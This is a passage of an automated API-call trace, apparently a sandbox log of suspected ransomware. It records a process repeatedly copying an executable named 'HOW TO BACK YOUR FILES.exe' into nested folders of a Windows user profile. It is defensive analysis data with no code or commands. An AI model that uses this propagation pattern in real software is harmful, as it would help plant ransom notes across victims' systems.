[0066.101] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.101] GetLastError () returned 0x0 [0066.101] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.101] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.101] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0066.101] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0066.101] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.101] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.102] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.102] GetLastError () returned 0x0 [0066.102] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.102] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.103] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0066.103] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0066.103] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.103] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.103] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.103] GetLastError () returned 0x0 [0066.104] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.104] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.104] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0066.104] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0066.104] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.104] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.105] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.105] GetLastError () returned 0x0 [0066.105] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.105] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.105] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0066.105] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0066.105] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.105] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.106] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.106] GetLastError () returned 0x0 [0066.106] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.106] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.106] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0066.107] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0066.107] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.107] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.107] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.107] GetLastError () returned 0x0 [0066.108] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.108] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.108] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0066.108] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0066.108] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.108] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.109] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.109] GetLastError () returned 0x0 [0066.109] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.109] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.109] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0066.109] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0066.109] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.109] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.110] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.110] GetLastError () returned 0x0 [0066.110] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.110] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.110] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0066.111] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0066.111] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.111] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.111] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.111] GetLastError () returned 0x0 [0066.111] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.112] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.112] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0066.112] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0066.112] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.112] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.113] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.113] GetLastError () returned 0x0 [0066.113] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.113] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application 